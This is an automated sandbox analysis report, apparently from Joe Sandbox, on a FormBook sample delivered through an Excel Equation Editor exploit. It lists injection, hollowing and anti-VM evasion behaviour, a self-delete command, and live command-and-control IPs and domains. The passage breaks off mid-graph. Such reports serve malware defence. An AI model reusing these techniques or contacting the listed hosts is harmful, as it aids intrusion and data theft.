          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wscript.exe
          Source: Binary string: wscript.pdb source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
          Source: Binary string: wscript.pdbN source: vbc.exe, 00000006.00000002.2215307464.00000000002E0000.00000040.00000001.sdmp
          Source: PI202009255687.xlsxInitial sample: OLE indicators vbamacros = False
          Source: PI202009255687.xlsxInitial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E94F7D push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041797C push ecx; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00417936 push esp; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0040E3E7 push ebp; iretd
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00417C0D push ss; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CEB5 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF6C push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF02 push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CF0B push eax; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041D7C6 push cs; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0041678C push 00000050h; retf
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E94F7D push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0085DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0028E3E6 pushad ; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0233DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0007E3E7 push ebp; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008678C push 00000050h; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008D7C6 push cs; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00087936 push esp; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008797C push ecx; retf
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_00087C0D push ss; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008CF0B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008CF02 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_0008CF6C push eax; ret
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: PI202009255687.xlsxStream path 'EncryptedPackage' entropy: 7.99992874048 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000000798E4 second address: 00000000000798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 0000000000079B5E second address: 0000000000079B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2688Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1688Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 2232Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2193784848.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2193737356.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000008.00000002.2389389885.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 6_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E95EF8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E91000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000A1C53 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000A11ED mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000A1BB3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 4_2_000A1BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E91000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 6_2_008626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 9_2_023426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E93912 SetUnhandledExceptionFilter,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E9305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E93912 SetUnhandledExceptionFilter,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E95465 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00E996FF __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.138.53 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.164.99.242 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 4F0000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
          Source: C:\Users\Public\vbc.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
          Source: C:\Users\Public\vbc.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\Public\vbc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
          Source: C:\Users\Public\vbc.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
          Source: C:\Users\Public\vbc.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,
          Source: C:\Users\Public\vbc.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
          Source: C:\Users\Public\vbc.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
          Source: C:\Users\Public\vbc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\Public\vbc.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
          Source: C:\Users\Public\vbc.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00E9515C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00EA0DE3 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1System Time Discovery2Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemorySecurity Software Discovery231Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information31DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323042 Sample: PI202009255687.xlsx Startdate: 26/11/2020 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 14 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 44 wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->44 32 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->78 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$PI202009255687.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Multi AV Scanner detection for dropped file 17->46 48 Machine Learning detection for dropped file 17->48 50 Maps a DLL or memory area into another process 17->50 52 Tries to detect virtualization through RDTSC time measurements 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 38 lygosfilms.info 34.102.136.180, 